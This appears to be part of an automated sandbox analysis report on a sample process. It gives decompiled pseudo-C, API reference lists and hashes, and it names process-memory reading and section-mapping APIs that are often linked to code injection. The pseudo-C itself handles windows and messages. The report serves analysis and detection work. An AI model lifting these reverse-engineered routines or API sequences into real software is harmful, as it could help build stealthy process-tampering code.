Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CapsDesktopDevice$CloseCreateErrorLastReleaselstrcpy
String ID:
API String ID: 4025149134-0
Opcode ID: 6e68ebfd18c71ff72d00be8f06140cb88c5148bf6ba323c2d38a3150ca78b233
Instruction ID: a7503a165749042c3579dda13deef00f5ffba9e8c44a479288e61d93b178a306
Opcode Fuzzy Hash: 6e68ebfd18c71ff72d00be8f06140cb88c5148bf6ba323c2d38a3150ca78b233
Instruction Fuzzy Hash: B931D2363147809BE758DF22E904B5AB7A0F748B94F448129EF9E83B54DF38D469CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C799B0, Relevance: 10.9, APIs: 7, Instructions: 403
windowthreadtimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00C799B0(signed int __edx, void* __rcx, void* __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t131;
				void* _t133;
				int _t137;
				int _t138;
				long _t155;
				signed int _t161;
				void* _t169;
				signed char _t172;
				signed char _t176;
				void* _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t189;
				signed int _t191;
				signed int _t193;
				signed int _t203;
				signed int _t205;
				void* _t223;
				signed int _t244;
				signed long long _t247;
				intOrPtr _t248;
				signed long long _t249;
				intOrPtr _t264;
				void* _t269;
				void* _t290;
				void* _t299;
				long long _t300;
				signed long long _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t306;
				void* _t311;
				signed long long _t323;
				signed long long _t325;
				void* _t326;

				_t306 = __r8;
				_t187 = __edx;
				_t1 = _t303 - 0x17; // 0xfe81
				_t302 = _t1;
				_t304 = _t303 - 0xb8;
				r15d = r9d;
				 *(_t302 + 0x67) = 0;
				r12d = __edx;
				r13d = r8d;
				_t299 = __rcx;
				_t131 = E00C6ADD8();
				_t3 = _t249 + 1; // 0x1
				_t205 = _t3;
				if(_t131 > 5) {
					L2:
					 *(_t302 + 0x6f) = 0;
					L3:
					_t300 = _t299 + 0x18;
					E00C78C30(_t187, _t300);
					_t247 =  *((intOrPtr*)(_t299 + 0x38));
					_t323 =  *((intOrPtr*)(_t247 + 0x118));
					E00C78CF0();
					_t133 = 0;
					if(( *(_t247 + 0x124) & 0x0000ffff) == 0) {
						__eflags =  *(_t299 + 0x260);
						if(__eflags != 0) {
							r9d = 1;
							r8d = r15d;
							_t187 = r13d;
							E00C795C8(r13d, __eflags, _t249, _t299, _t299, _t300);
							__eflags = 0;
							 *(_t299 + 0x260) = 0;
						}
						E00C78C30(_t187, _t300);
						_t247 =  *((intOrPtr*)(_t299 + 0x38));
						_t323 =  *((intOrPtr*)(_t247 + 0x118));
						E00C78CF0();
						__eflags = _t323;
						if(_t323 != 0) {
							r8d = 0;
							_t187 = 0;
							_t172 = E00C81978(_t177, 0, _t247, _t299, _t290) & 0x0000ffff;
						} else {
							_t172 = 0;
						}
						goto L13;
					} else {
						_t10 = _t247 + 1; // 0x1
						_t176 = _t10;
						if((_t176 & r12b) != 0) {
							_t211 =  *(_t299 + 0x260);
							if( *(_t299 + 0x260) == 0) {
								GetWindowRect();
								 *(_t299 + 0x260) = _t176;
							}
							r9d = 0;
							r8d = r15d;
							_t187 = r13d;
							E00C795C8(r13d, _t211, _t249, _t299, _t299, _t300);
							_t133 = 0;
						}
						if((r12b & 0x00000004) == 0) {
							L12:
							_t172 =  *(_t302 + 0x67);
							L13:
							_t137 = E00C78C30(_t187, _t300);
							 *( *((intOrPtr*)(_t299 + 0x38)) + 4) = r13d;
							_t292 =  *((intOrPtr*)(_t299 + 0x38));
							 *( *((intOrPtr*)(_t299 + 0x38)) + 8) = r15d;
							E00C78CF0();
							if(r12d == 0) {
								L77:
								return _t137;
							}
							 *((long long*)(_t302 - 0x51)) = _t300;
							_t189 = r12d & 0x00000002;
							_t179 = r12d & 0x00000004;
							 *(_t302 + 0x77) = _t189;
							 *(_t302 + 0x5f) = _t179;
							_t138 = 0;
							if(_t189 == 0) {
								__eflags = _t179;
								if(_t179 == 0) {
									r8d = 1;
									L25:
									_t191 = r12d & 0x00000020;
									_t181 = r12d & 0x00000040;
									 *(_t302 - 0x49) = _t191;
									 *(_t302 - 0x45) = _t181;
									if(_t191 == 0) {
										__eflags = _t181;
										if(_t181 == 0) {
											r8d = 1;
											L30:
											_t193 = r12d & 0x00000008;
											_t183 = r12d & 0x00000010;
											 *(_t302 - 0x41) = _t193;
											 *(_t302 - 0x3d) = _t183;
											if(_t193 != 0) {
												L33:
												E00C81978(_t183, 2, _t247, _t299, _t292);
												_t138 = 1;
												L34:
												_t40 = _t302 - 0x51; // 0xfe30
												_t311 = _t40;
												 *(_t304 + 0x28) = _t138;
												_t42 = _t302 + 0x67; // 0xfee8
												_t307 = _t42;
												 *(_t304 + 0x20) = 0;
												_t137 = E00C7C47C(_t299,  *( *((intOrPtr*)(_t299 + 0x38)) + 4), _t42, _t311);
												_t301 = _t247;
												_t223 = ( *(_t302 + 0x67) & 0x0000ffff) - 0xa - 7;
												if(_t223 <= 0) {
													__imp__GetWindowLongPtrA();
													asm("dec eax");
													if(_t223 < 0) {
														_t137 = E00C7C024(_t247, _t311);
														if(_t137 == 0) {
															_t137 = GetParent();
															_t301 =  !=  ? _t247 : _t301;
														}
													}
												}
												if(_t301 == 0) {
													L44:
													__eflags = _t323;
													if(_t323 == 0) {
														goto L52;
													}
													_t137 = E00C7C050(_t247, _t249, _t299 + 0x88, _t323, _t301);
													__eflags = _t137;
													if(_t137 == 0) {
														L50:
														__eflags = r12d - 0x8001;
														if(r12d != 0x8001) {
															r9d = 0;
															r8d = 0;
															__eflags = 0;
															_t55 = _t311 + 1; // 0x1
															 *(_t304 + 0x20) = _t55;
															_t137 = E00C78CFC(0, 0, _t247, _t249, _t299, _t302, _t307);
														}
														goto L52;
													}
													__eflags = _t301;
													if(_t301 == 0) {
														L49:
														_t301 = _t323;
														goto L52;
													}
													__eflags = _t323 - _t301;
													if(_t323 == _t301) {
														goto L49;
													}
													__eflags = _t172 & 0x00000007;
													if((_t172 & 0x00000007) == 0) {
														goto L50;
													}
													goto L49;
												} else {
													_t137 = E00C7BB64(_t247, _t249, _t299 + 0x88, _t301, _t311);
													if((_t137 & 0x00000001) == 0) {
														goto L44;
													}
													_t137 = 0;
													if( *(_t299 + 0x260) != 0) {
														goto L44;
													}
													if(_t301 != _t323) {
														_t155 = GetWindowThreadProcessId();
														_t307 = _t301;
														 *(_t304 + 0x20) = 1;
														r9d = 0;
														E00C78CFC(_t155, 0, _t247, _t249, _t299, _t302, _t301);
													}
													_t137 = 1;
													 *(_t302 + 0x67) = 1;
													L52:
													if(_t301 == 0) {
														goto L77;
													}
													_t57 = _t302 - 0x39; // 0xfe48
													_t295 = _t57;
													 *((intOrPtr*)(_t302 - 0x39)) = 0x3c;
													_t137 = GetWindowInfo(??, ??);
													if(_t137 == 0) {
														goto L77;
													}
													r14d = r15w & 0xffffffff;
													_t325 = _t323 << 0x00000010 | _t247;
													_t59 = _t249 + 1; // 0x1
													if( *(_t302 + 0x67) == _t59) {
														_t295 = _t301;
														if((E00C7BB64(_t247, _t249, _t299 + 0x88, _t301, _t311) & 0x00000002) == 0) {
															r15w = r15w -  *((intOrPtr*)(_t302 - 0x21));
															r13w = r13w -  *((intOrPtr*)(_t302 - 0x25));
															_t249 = _t249 << 0x00000010 | _t247;
															__eflags = _t249;
														} else {
															_t249 = _t325;
														}
													}
													_t248 =  *((intOrPtr*)(_t299 + 0x38));
													_t67 = _t302 + 7; // 0xfe88
													 *((long long*)(_t304 + 0x30)) = _t67;
													r9d = 0;
													 *(_t304 + 0x28) = 0x3e8;
													 *(_t304 + 0x20) = 2;
													_t72 = _t311 + 3; // 0x3
													r8d = _t72;
													SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
													r13d =  *(_t302 + 0x6f);
													_t326 = E00C809D4;
													_t137 = 0;
													_t264 = 0xc78f34;
													if( *(_t302 + 0x77) == 0) {
														__eflags =  *(_t302 + 0x5f);
														if( *(_t302 + 0x5f) == 0) {
															goto L63;
														}
														 *(_t304 + 0x40) = _t325;
														 *(_t304 + 0x38) = _t249;
														 *((intOrPtr*)(_t304 + 0x30)) = 0xa2;
														 *(_t304 + 0x28) = 0x202;
														goto L62;
													} else {
														 *(_t304 + 0x40) = _t325;
														 *(_t304 + 0x38) = _t249;
														 *((intOrPtr*)(_t304 + 0x30)) = 0xa1;
														 *(_t304 + 0x28) = 0x201;
														L62:
														_t307 =  *((intOrPtr*)(_t302 - 0x51));
														 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
														_t322 =  ==  ? _t264 : _t326;
														_t295 = _t301;
														 *((long long*)( ==  ? _t264 : _t326))();
														_t264 = 0xc78f34;
														_t137 = 0;
														L63:
														if( *(_t302 - 0x49) == _t137) {
															__eflags =  *(_t302 - 0x45) - _t137;
															if( *(_t302 - 0x45) == _t137) {
																L68:
																if( *(_t302 - 0x41) == _t137) {
																	__eflags =  *(_t302 - 0x3d) - _t137;
																	if( *(_t302 - 0x3d) == _t137) {
																		L73:
																		if((0x00000001 & r12b) != 0) {
																			_t307 =  *((intOrPtr*)(_t302 - 0x51));
																			_t248 = 0xc78f34;
																			 *(_t304 + 0x40) = _t325;
																			 *(_t304 + 0x38) = _t249;
																			_t244 = r13d;
																			 *((intOrPtr*)(_t304 + 0x30)) = 0xa0;
																			_t295 = _t301;
																			_t327 =  ==  ? 0xc78f34 : _t326;
																			 *(_t304 + 0x28) = 0x200;
																			 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
																			_t137 =  *((long long*)( ==  ? 0xc78f34 : _t326))();
																		}
																		asm("inc ecx");
																		if(_t244 < 0) {
																			r8d = 0;
																			E00C81978(1, 0, _t248, _t299, _t295);
																			E00C7F480(_t249, _t299);
																			E00C7BD68(_t248, _t295);
																			r8d =  *(_t302 + 0x7f) & 0x0000ffff;
																			_t269 =  ==  ? _t301 : _t248;
																			_t137 = PostMessageA(??, ??, ??, ??);
																		}
																		goto L77;
																	}
																	 *(_t304 + 0x40) = _t325;
																	 *(_t304 + 0x38) = _t249;
																	 *((intOrPtr*)(_t304 + 0x30)) = 0xa5;
																	 *(_t304 + 0x28) = 0x205;
																	L72:
																	_t307 =  *((intOrPtr*)(_t302 - 0x51));
																	_t248 = 0xc78f34;
																	_t295 = _t301;
																	_t318 =  ==  ? 0xc78f34 : _t326;
																	 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
																	_t137 =  *((long long*)( ==  ? 0xc78f34 : _t326))();
																	goto L73;
																}
																 *(_t304 + 0x40) = _t325;
																 *(_t304 + 0x38) = _t249;
																 *((intOrPtr*)(_t304 + 0x30)) = 0xa4;
																 *(_t304 + 0x28) = 0x204;
																goto L72;
															}
															 *(_t304 + 0x40) = _t325;
															 *(_t304 + 0x38) = _t249;
															 *((intOrPtr*)(_t304 + 0x30)) = 0xa8;
															 *(_t304 + 0x28) = 0x208;
															L67:
															_t307 =  *((intOrPtr*)(_t302 - 0x51));
															 *(_t304 + 0x20) =  *(_t302 + 0x67) & 0x0000ffff;
															_t320 =  ==  ? _t264 : _t326;
															_t295 = _t301;
															 *((long long*)( ==  ? _t264 : _t326))();
															_t137 = 0;
															goto L68;
														}
														 *(_t304 + 0x40) = _t325;
														 *(_t304 + 0x38) = _t249;
														 *((intOrPtr*)(_t304 + 0x30)) = 0xa7;
														 *(_t304 + 0x28) = 0x207;
														goto L67;
													}
												}
											}
											if(_t183 == 0) {
												goto L34;
											}
											r8d = 0;
											goto L33;
										}
										r8d = 0;
									}
									E00C81978(_t181, 4, _t247, _t299, _t292);
									r8d = 1;
									_t138 = r8d;
									goto L30;
								}
								r8d = 0;
								_t34 = _t306 + 1; // 0x1
								_t203 = _t34;
								L16:
								E00C81978(_t179, _t203, _t247, _t299, _t292);
								r8d = 1;
								_t138 = r8d;
								goto L25;
							}
							_t29 = _t300 + 1; // 0x1
							_t161 = _t29;
							r8d = _t161;
							_t203 = _t161;
							goto L16;
						}
						_t214 =  *(_t299 + 0x260) - _t133;
						if( *(_t299 + 0x260) != _t133) {
							r9d = _t176;
							r8d = r15d;
							E00C795C8(r13d, _t214, _t249, _t299, _t299, _t300);
							 *(_t299 + 0x260) = 0;
						}
						r9d = 0;
						 *(_t304 + 0x20) = _t176;
						r8d = 0;
						_t187 = 0;
						E00C78CFC(0, 0, _t247, _t249, _t299, _t302, _t306);
						goto L12;
					}
				}
				_t169 = E00C6ADE8();
				 *(_t302 + 0x6f) = _t205;
				if(_t169 < 3) {
					goto L3;
				}
				goto L2;
			}

0x00c799b0
0x00c799b0
0x00c799bd
0x00c799bd
0x00c799c2
0x00c799cb
0x00c799ce
0x00c799d2
0x00c799d5
0x00c799d8
0x00c799db
0x00c799e0
0x00c799e0
0x00c799e6
0x00c799f5
0x00c799f5
0x00c799f8
0x00c799f8
0x00c799ff
0x00c79a04
0x00c79a0b
0x00c79a19
0x00c79a1e
0x00c79a23
0x00c79b02
0x00c79b08
0x00c79b0a
0x00c79b10
0x00c79b13
0x00c79b19
0x00c79b1e
0x00c79b20
0x00c79b20
0x00c79b29
0x00c79b2e
0x00c79b35
0x00c79b3c
0x00c79b43
0x00c79b46
0x00c79b4f
0x00c79b52
0x00c79b5c
0x00c79b48
0x00c79b48
0x00c79b48
0x00000000
0x00c79a29
0x00c79a29
0x00c79a29
0x00c79a2f
0x00c79a31
0x00c79a37
0x00c79a43
0x00c79a49
0x00c79a49
0x00c79a4f
0x00c79a52
0x00c79a55
0x00c79a5b
0x00c79a60
0x00c79a60
0x00c79a66
0x00c79a9d
0x00c79a9d
0x00c79aa0
0x00c79aa3
0x00c79aaf
0x00c79ab3
0x00c79ab7
0x00c79abb
0x00c79ac5
0x00c79f7b
0x00c79f8e
0x00c79f8e
0x00c79ace
0x00c79ad2
0x00c79ad8
0x00c79adb
0x00c79ade
0x00c79ae1
0x00c79ae5
0x00c79b64
0x00c79b66
0x00c79b74
0x00c79b7a
0x00c79b80
0x00c79b83
0x00c79b86
0x00c79b89
0x00c79b8e
0x00c79ba8
0x00c79baa
0x00c79bb1
0x00c79bb7
0x00c79bbd
0x00c79bc0
0x00c79bc3
0x00c79bc6
0x00c79bcb
0x00c79bd4
0x00c79bdc
0x00c79be1
0x00c79be6
0x00c79bea
0x00c79bea
0x00c79bee
0x00c79bf2
0x00c79bf2
0x00c79bf9
0x00c79c02
0x00c79c0b
0x00c79c12
0x00c79c16
0x00c79c20
0x00c79c26
0x00c79c2b
0x00c79c30
0x00c79c37
0x00c79c3c
0x00c79c45
0x00c79c45
0x00c79c37
0x00c79c2b
0x00c79c4c
0x00c79ca2
0x00c79ca2
0x00c79ca5
0x00000000
0x00000000
0x00c79cb1
0x00c79cb6
0x00c79cb8
0x00c79cce
0x00c79cce
0x00c79cd5
0x00c79cd7
0x00c79cda
0x00c79cdd
0x00c79ce2
0x00c79ce6
0x00c79cea
0x00c79cea
0x00000000
0x00c79cd5
0x00c79cba
0x00c79cbd
0x00c79cc9
0x00c79cc9
0x00000000
0x00c79cc9
0x00c79cbf
0x00c79cc2
0x00000000
0x00000000
0x00c79cc4
0x00c79cc7
0x00000000
0x00000000
0x00000000
0x00c79c4e
0x00c79c58
0x00c79c5f
0x00000000
0x00000000
0x00c79c61
0x00c79c69
0x00000000
0x00000000
0x00c79c6e
0x00c79c75
0x00c79c7b
0x00c79c88
0x00c79c8e
0x00c79c92
0x00c79c92
0x00c79c97
0x00c79c9c
0x00c79cef
0x00c79cf4
0x00000000
0x00000000
0x00c79cfa
0x00c79cfa
0x00c79cfe
0x00c79d08
0x00c79d10
0x00000000
0x00000000
0x00c79d1a
0x00c79d22
0x00c79d25
0x00c79d2c
0x00c79d35
0x00c79d3f
0x00c79d46
0x00c79d4b
0x00c79d5c
0x00c79d5c
0x00c79d41
0x00c79d41
0x00c79d41
0x00c79d3f
0x00c79d5f
0x00c79d63
0x00c79d67
0x00c79d6c
0x00c79d6f
0x00c79d7a
0x00c79d88
0x00c79d88
0x00c79d8c
0x00c79d92
0x00c79d96
0x00c79d9d
0x00c79d9f
0x00c79da9
0x00c79dc7
0x00c79dca
0x00000000
0x00000000
0x00c79dcc
0x00c79dd1
0x00c79dd6
0x00c79dde
0x00000000
0x00c79dab
0x00c79dab
0x00c79db0
0x00c79db5
0x00c79dbd
0x00c79de6
0x00c79dee
0x00c79df8
0x00c79dfd
0x00c79e01
0x00c79e07
0x00c79e0a
0x00c79e11
0x00c79e13
0x00c79e16
0x00c79e34
0x00c79e37
0x00c79e79
0x00c79e7c
0x00c79e9a
0x00c79e9d
0x00c79ee4
0x00c79eec
0x00c79eee
0x00c79ef2
0x00c79ef9
0x00c79f02
0x00c79f07
0x00c79f0a
0x00c79f12
0x00c79f15
0x00c79f19
0x00c79f28
0x00c79f2d
0x00c79f2d
0x00c79f30
0x00c79f35
0x00c79f37
0x00c79f3f
0x00c79f4a
0x00c79f52
0x00c79f57
0x00c79f65
0x00c79f75
0x00c79f75
0x00000000
0x00c79f35
0x00c79e9f
0x00c79ea4
0x00c79ea9
0x00c79eb1
0x00c79eb9
0x00c79eb9
0x00c79ebd
0x00c79ece
0x00c79ed1
0x00c79edc
0x00c79ee1
0x00000000
0x00c79ee1
0x00c79e7e
0x00c79e83
0x00c79e88
0x00c79e90
0x00000000
0x00c79e90
0x00c79e39
0x00c79e3e
0x00c79e43
0x00c79e4b
0x00c79e53
0x00c79e5b
0x00c79e65
0x00c79e6a
0x00c79e6e
0x00c79e74
0x00c79e77
0x00000000
0x00c79e77
0x00c79e18
0x00c79e1d
0x00c79e22
0x00c79e2a
0x00000000
0x00c79e2a
0x00c79da9
0x00c79c4c
0x00c79bcf
0x00000000
0x00000000
0x00c79bd1
0x00000000
0x00c79bd1
0x00c79bac
0x00c79bac
0x00c79b98
0x00c79b9d
0x00c79ba3
0x00000000
0x00c79ba3
0x00c79b68
0x00c79b6b
0x00c79b6b
0x00c79aef
0x00c79af2
0x00c79af7
0x00c79afd
0x00000000
0x00c79afd
0x00c79ae7
0x00c79ae7
0x00c79aea
0x00c79aed
0x00000000
0x00c79aed
0x00c79a68
0x00c79a6e
0x00c79a70
0x00c79a73
0x00c79a7c
0x00c79a83
0x00c79a83
0x00c79a89
0x00c79a8c
0x00c79a90
0x00c79a93
0x00c79a98
0x00000000
0x00c79a98
0x00c79a23
0x00c799e8
0x00c799ed
0x00c799f3
0x00000000
0x00000000
0x00000000

APIs

GetWindowRect.USER32 ref: 00C79A43
GetWindowLongPtrA.USER32 ref: 00C79C20
GetParent.USER32 ref: 00C79C3C
GetWindowThreadProcessId.USER32 ref: 00C79C75
GetWindowInfo.USER32 ref: 00C79D08
SendMessageTimeoutA.USER32 ref: 00C79D8C

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

PostMessageA.USER32 ref: 00C79F75

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Message$AncestorInfoLongParentPostProcessRectSendThreadTimeout
String ID:
API String ID: 1491194875-0
Opcode ID: a808a7ab5fae6bca2803e4c6983bc2374f1f71c65badd49f090b7e07db90929d
Instruction ID: 0408f32014e0d68e95e8ab7dce12ede75056c9f1f76234f97fa272d5e09298ea
Opcode Fuzzy Hash: a808a7ab5fae6bca2803e4c6983bc2374f1f71c65badd49f090b7e07db90929d
Instruction Fuzzy Hash: CEE1DE327147A18BEB24DF66E5407AE77A1F785B88F40812AEE4E57F58DB38C506CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C64634, Relevance: 7.6, APIs: 5, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C64664
ZwQueryInformationProcess.NTDLL ref: 00C64683
ReadProcessMemory.KERNEL32 ref: 00C646AE
ReadProcessMemory.KERNEL32 ref: 00C646D6
ReadProcessMemory.KERNEL32 ref: 00C6470F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$MemoryRead$InformationQuerymemset
String ID:
API String ID: 1463847938-0
Opcode ID: 159bf29e0f137b6d19e6b42216e7bb2768e01392b9899e155e9f77c7bead5438
Instruction ID: 794d1d4d3b2fdd94490dae4e37114e5141e4b877368830f5e09ab6c07b8e1bdd
Opcode Fuzzy Hash: 159bf29e0f137b6d19e6b42216e7bb2768e01392b9899e155e9f77c7bead5438
Instruction Fuzzy Hash: E4312A76300B9186DB358F66E8407AE77A9F789B98F884126DF8D43B18DF38C646C740

Uniqueness

Uniqueness Score: -1.00%

Function 00C63450, Relevance: 7.6, APIs: 5, Instructions: 70nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C63486
NtCreateSection.NTDLL ref: 00C634D6
memset.NTDLL ref: 00C63501
RtlNtStatusToDosError.NTDLL ref: 00C6351D
ZwClose.NTDLL ref: 00C63533

Part of subcall function 00C636A8: NtMapViewOfSection.NTDLL ref: 00C636E2
Part of subcall function 00C636A8: RtlNtStatusToDosError.NTDLL ref: 00C636EA

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorSectionStatusmemset$CloseCreateView
String ID:
API String ID: 4231514893-0
Opcode ID: e19e0639ccb1fa3b2e09695db12b4080b545d9305df54842d9e79da1bbed75ca
Instruction ID: 3421b3c6da858713b998daae17b3013be2efe7938aa905d79c13563a52a8e01c
Opcode Fuzzy Hash: e19e0639ccb1fa3b2e09695db12b4080b545d9305df54842d9e79da1bbed75ca
Instruction Fuzzy Hash: 3E312B72B10B548AE720CF62E48479D77B4F7887A8F544226EF5A97A48DF34CA85C740

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CDE8, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00C7CDE8(void* __ecx, void* __edx, void* __eflags, signed long long __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				intOrPtr _v16;
				long long _v40;
				char _v104;
				long long _v120;
				int _t17;
				void* _t23;
				intOrPtr _t27;
				long long _t35;
				void* _t47;
				void* _t50;

				_t54 = __rbp;
				_t23 = __edx;
				_t22 = __ecx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t35 = __rcx;
				_t27 = r9d;
				_t52 = __r8;
				_t50 = __rdx;
				_t17 = E00C7C050(__rax, __rcx, __rcx + 0x88, __rdx, __r8);
				if(_t17 != 0) {
					_t17 = IsIconic();
					_t30 = _t17;
					if(_t17 == 0) {
						_t47 = _t50;
						_t60 =  *((intOrPtr*)(_t35 + 0x720));
						_v120 = __r8;
						_t17 = E00C7CCA0(__ecx, _t23, _t30, __rax, _t35, _t35, _t47, __r8,  *((intOrPtr*)(_t35 + 0x720)),  *((intOrPtr*)(_t35 + 0x728)));
						if(_t17 != 0) {
							_t8 = _t47 + 0x60; // 0x60
							r8d = _t8;
							memset(??, ??, ??);
							r8d = 0;
							E00C7CFB4(__rax, _t35, _t50,  &_v104, __r8, _t60);
							asm("movups xmm0, [esi]");
							_v40 = _t35;
							_v16 = _t27;
							asm("movdqu [esp+0x78], xmm0");
							GetWindow(??, ??);
							GetWindow(??, ??);
							_t17 = E00C7CECC(_t22, r8d, __rax, _t35, __rax,  &_v104, _t52, _t54);
						}
					}
				}
				return _t17;
			}

0x00c7cde8
0x00c7cde8
0x00c7cde8
0x00c7cde8
0x00c7cded
0x00c7cdf2
0x00c7cdff
0x00c7ce02
0x00c7ce0c
0x00c7ce0f
0x00c7ce12
0x00c7ce19
0x00c7ce22
0x00c7ce28
0x00c7ce2a
0x00c7ce37
0x00c7ce3a
0x00c7ce44
0x00c7ce49
0x00c7ce50
0x00c7ce59
0x00c7ce59
0x00c7ce5d
0x00c7ce62
0x00c7ce6d
0x00c7ce72
0x00c7ce7a
0x00c7ce82
0x00c7ce89
0x00c7ce8f
0x00c7ce9d
0x00c7ceab
0x00c7ceab
0x00c7ce50
0x00c7ce2a
0x00c7cec8

APIs

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

IsIconic.USER32 ref: 00C7CE22

Part of subcall function 00C7CCA0: GetWindowRect.USER32 ref: 00C7CD0B

memset.NTDLL ref: 00C7CE5D

Part of subcall function 00C7CFB4: GetWindowRect.USER32 ref: 00C7CFCC
Part of subcall function 00C7CFB4: GetWindowLongPtrA.USER32 ref: 00C7CFFD
Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D020
Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D040
Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D052
Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D072

GetWindow.USER32 ref: 00C7CE8F
GetWindow.USER32 ref: 00C7CE9D

Part of subcall function 00C7CECC: memset.NTDLL ref: 00C7CF0B
Part of subcall function 00C7CECC: GetWindow.USER32 ref: 00C7CF5D
Part of subcall function 00C7CECC: GetWindow.USER32 ref: 00C7CF6B
Part of subcall function 00C7CECC: GetWindow.USER32 ref: 00C7CF86

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$InfoRectScrollmemcpymemset$AncestorIconicLong
String ID:
API String ID: 1868980946-0
Opcode ID: 6bb62e6d9125e0eea3aca33de264dbfa78a1ed7aa45a66b4ca7e5e5e3c10ecef
Instruction ID: 53df167f688a3ebf6c9c890374224c85f4ee395546fca6e9145230a52e2e7aee
Opcode Fuzzy Hash: 6bb62e6d9125e0eea3aca33de264dbfa78a1ed7aa45a66b4ca7e5e5e3c10ecef
Instruction Fuzzy Hash: BF114C66604B8186EB10DF22E580B6E73A5F798BC0F94C12AAF8D47B09DF38C545CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C636A8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 00C636E2
RtlNtStatusToDosError.NTDLL ref: 00C636EA

Strings

@, xrefs: 00C636B2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorSectionStatusView
String ID: @
API String ID: 1313840181-2766056989
Opcode ID: 9a9430f6e0c6e0034a70e1051b54e5bc3529ff825cbb78c458a32c68ee6eb9c2
Instruction ID: 0162171800d22f6351983ee297f8f76bcb9f45ef2825d3f22f0b83537e73f094
Opcode Fuzzy Hash: 9a9430f6e0c6e0034a70e1051b54e5bc3529ff825cbb78c458a32c68ee6eb9c2
Instruction Fuzzy Hash: A1E0C976A04B04C6E7209F20E48DB4D36A8F364354FA10229C79D02B50DF3A8AA9CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C835E4, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00C83612
GetSysColor.USER32 ref: 00C8361D
GetSysColor.USER32 ref: 00C83628
GetSysColor.USER32 ref: 00C83633
GetClientRect.USER32 ref: 00C83640
BeginPaint.USER32 ref: 00C8364D
GetClipBox.GDI32 ref: 00C83666
CreateCompatibleDC.GDI32 ref: 00C8366F
CreateCompatibleBitmap.GDI32 ref: 00C83692
SelectObject.GDI32 ref: 00C836AA
